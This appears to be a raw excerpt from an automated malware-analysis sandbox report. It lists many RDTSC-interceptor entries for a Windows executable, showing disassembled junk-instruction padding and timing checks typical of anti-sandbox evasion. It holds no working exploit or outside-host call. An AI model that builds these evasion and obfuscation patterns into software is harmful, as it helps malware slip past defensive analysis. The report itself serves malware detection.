            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E1E5 second address: E0E203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF9ACE940A9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E203 second address: E0E216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF9ACEA2286h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E216 second address: E0E21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1073C second address: E10751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FF9ACEA228Bh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E10751 second address: E10764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jbe 00007FF9ACE94096h 0x0000000f pop ecx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E10764 second address: E10777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA228Eh 0x00000009 pop esi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13C32 second address: E13C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13D7F second address: E13D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13D83 second address: E13DA5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FF9ACE9409Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jp 00007FF9ACE94096h 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13DA5 second address: E13DC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF9ACEA2296h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13DC5 second address: E13DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14030 second address: E1403A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF9ACEA2286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1403A second address: E14044 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF9ACE9409Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14044 second address: E1407A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jnl 00007FF9ACEA22A4h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1407A second address: E14080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14080 second address: E14086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14086 second address: E1408C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18167 second address: E18191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF9ACEA228Fh 0x0000000b jns 00007FF9ACEA228Ch 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18191 second address: E181AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF9ACE940A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E181AF second address: E181BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18610 second address: E1861F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FF9ACE94096h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18784 second address: E18788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18788 second address: E187D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FF9ACE940A2h 0x0000000e push esi 0x0000000f pop esi 0x00000010 jne 00007FF9ACE94096h 0x00000016 popad 0x00000017 jl 00007FF9ACE9409Eh 0x0000001d pushad 0x0000001e popad 0x0000001f jno 00007FF9ACE94096h 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FF9ACE940A6h 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CD4F second address: E1CD53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CD53 second address: E1CD59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CD59 second address: E1CD60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CD60 second address: E1CD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FF9ACE94096h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CD71 second address: E1CD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D042 second address: E1D063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Eh 0x00000007 jng 00007FF9ACE94096h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 js 00007FF9ACE94096h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA9A0 second address: DCA9A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA9A5 second address: DCAA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jmp 00007FF9ACE940A9h 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FF9ACE94098h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c jmp 00007FF9ACE940A6h 0x00000031 mov ebx, dword ptr [ebp+12490BE7h] 0x00000037 jmp 00007FF9ACE940A3h 0x0000003c add eax, ebx 0x0000003e jmp 00007FF9ACE9409Ah 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jc 00007FF9ACE94096h 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAA33 second address: DCAA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAA38 second address: DCAA3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAA3E second address: DCAA42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D6C6 second address: E1D6E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE9409Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E273FC second address: E27400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27400 second address: E27425 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF9ACE940A9h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27708 second address: E2770C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27A00 second address: E27A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE9409Bh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27A13 second address: E27A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF9ACEA2286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27A1F second address: E27A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FF9ACE940A9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27A43 second address: E27A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007FF9ACEA2286h 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27A50 second address: E27A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E27A56 second address: E27A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E285F6 second address: E28611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E28611 second address: E28621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jne 00007FF9ACEA2286h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E28621 second address: E2863D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF9ACE940A7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2863D second address: E2867A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jg 00007FF9ACEA2286h 0x00000010 jmp 00007FF9ACEA2293h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 jmp 00007FF9ACEA2297h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E28945 second address: E28949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E28949 second address: E2896C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FF9ACEA2298h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2896C second address: E28972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E28972 second address: E2898A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jc 00007FF9ACEA2286h 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C271 second address: E2C29C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF9ACE94096h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jns 00007FF9ACE94096h 0x00000013 jmp 00007FF9ACE940A7h 0x00000018 pop ebx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C29C second address: E2C2BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACEA2299h 0x00000009 ja 00007FF9ACEA2286h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C410 second address: E2C414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C414 second address: E2C41A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2C693 second address: E2C6AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FF9ACE9409Ch 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E32B18 second address: E32B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007FF9ACEA228Eh 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E32B29 second address: E32B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E32B32 second address: E32B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E340CE second address: E340DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E340DE second address: E340FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF9ACEA228Ch 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E340FA second address: E340FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A96A second address: E3A986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jmp 00007FF9ACEA2292h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A986 second address: E3A98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B0AB second address: E3B0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2290h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B0BF second address: E3B0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FF9ACE94096h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B0CF second address: E3B0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B0D3 second address: E3B0EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FF9ACE940A2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B7CF second address: E3B808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF9ACEA2295h 0x0000000b popad 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF9ACEA2297h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B808 second address: E3B819 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B819 second address: E3B82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FF9ACEA2288h 0x0000000b push edi 0x0000000c jne 00007FF9ACEA2286h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42B34 second address: E42B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007FF9ACE940A3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F992 second address: E4F996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F996 second address: E4F9A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FF9ACE94096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F3DE second address: E4F3E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F3E2 second address: E4F3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FF9ACE94096h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F3F1 second address: E4F3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F3F7 second address: E4F41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE9409Fh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF9ACE9409Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F41E second address: E4F42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FF9ACEA228Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F58F second address: E4F594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5192C second address: E51947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF9ACEA228Fh 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E514E3 second address: E514E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E514E9 second address: E51501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2294h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51501 second address: E5150F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5150F second address: E51520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FF9ACEA2286h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81FC5 second address: D81FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81FCB second address: D81FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FF9ACEA2288h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E600D0 second address: E600D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E600D4 second address: E600D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E600D8 second address: E600EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FF9ACE9409Eh 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FF43 second address: E5FF48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FF48 second address: E5FF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE9409Ah 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E667F8 second address: E66802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF9ACEA2286h 0x0000000a rdtsc
